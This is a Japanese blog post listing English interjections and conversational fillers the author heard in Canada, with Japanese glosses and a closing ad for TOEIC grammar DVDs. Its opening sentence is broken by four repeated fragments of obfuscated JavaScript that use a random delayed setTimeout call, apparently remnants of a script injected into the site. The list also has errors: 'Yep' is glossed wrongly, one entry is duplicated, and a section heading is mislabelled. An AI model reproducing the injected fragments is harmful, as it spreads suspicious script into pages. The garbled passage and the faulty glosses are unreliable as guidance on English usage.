カナダでよく聞いた会話中のひと言表現(相槌・間投詞)まとめ

今回は英会話のとき役立つひと言表現andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}のご紹介です。

ちょっとした相槌や間投詞が使えるだけで会話が断然スムーズになります。カナダでよく使われていた表現をまとめましたので、ぜひネイティブとの会話で使ってみてください!

 

カナダでよく聞いた会話中のひと言表現

驚き

Amazing! 驚き!
Incredible! すげぇ!
Unbelievable! 信じられない!
Oh my goodness! マジかよ!
(※カナダでは「Oh my god!」よりも、「Oh my goodness!」の方がよく聞きました。)
Wow! おぉ!

言葉つなぎ

Well えーとね、あのー
You know あのね
So だからさ、ということは
Just like〜 まさに〜、〜みたいな
Though (文頭につけて) ~なのに、~だけど
You mean つまり、要するに
A kind of〜 いわいる〜みたいな
Somehow どういうわけかさぁ

同意

Right その通り、そうだよ
Yep あのね
That’s it! それそれ!
Bingo! その通り! 大当たり!
absolutely! 絶対に、間違いない
Completely 完全に、まったく
Definitely まさに、確実に
Exactly まさしく
Definitely まさに、確実に
Sure もちろん
For sure 確実に、絶対に

聞き返し、確認

~, or something? ~とかってこと?
Seriously? マジなの?
~, right? ~でしょ?
Excuse me? すみません、今なんて?

嘆き、憤り

Gosh / Gee! ええ~!
Shoot / Shit! くそっ!
Come on! おい!
Give me a break! ちょっと待ってよ!
No way! そんなバカな!
Oops! やべっ!
Ouch! いてぇっ!
Oh-No! あーあ!
Yuck! うぁー!

あいさつ

What’s up? どうよ?
Hey! やぁ!
Guess what? (「何だかわかる?」 が転じて)あのね
See you then! それじゃまたね~
Later on! ああ、またな~
(※「See you later」に返す言葉)
Take care! じゃあね、気をつけてね〜

賞賛

Great! 良かった、すばらしい
Way to go! その調子だ!
That’s really nice! いいね!
Cheers! 乾杯!
Congratulations! おめでとう!
Good for you! 良かったね!

賞賛

a little bit ちょっとだけね
Not at all そんなことないよ
Not really それほどでもない

 

さいごに

いかがでしょうか?
相槌をうまく使うことでネイティブとの会話はより弾みます。ぜひ今回ご紹介した表現などを使っていきましょうね〜。

book-image
 

TOEIC文法に特化した教材がここに!

3時間レッスンを驚き価格でご提供!

有名先生のリアル授業をDVDでお届け!

3時間の40レッスンのDVD教材がたったの1,800円!(税抜き)

購入はこちら! 購入はこちら!

この記事を書いた人

桃太郎

桃太郎

このサイトの管理人であり、モモセ先生のDVDで英文法を勉強中の桃太郎です。過去カナダに2年間在住していたことがありますが、『文法なんて別にどうでもいいでしょ!』と英文法を完全になめきっていました......このブログでは英文法をいま一度学び直している僕が、気づいたことや大事だと思ったことなどをみなさんにシェアしていきます。

桃太郎が書いた記事一覧はこちら

Facebookコメント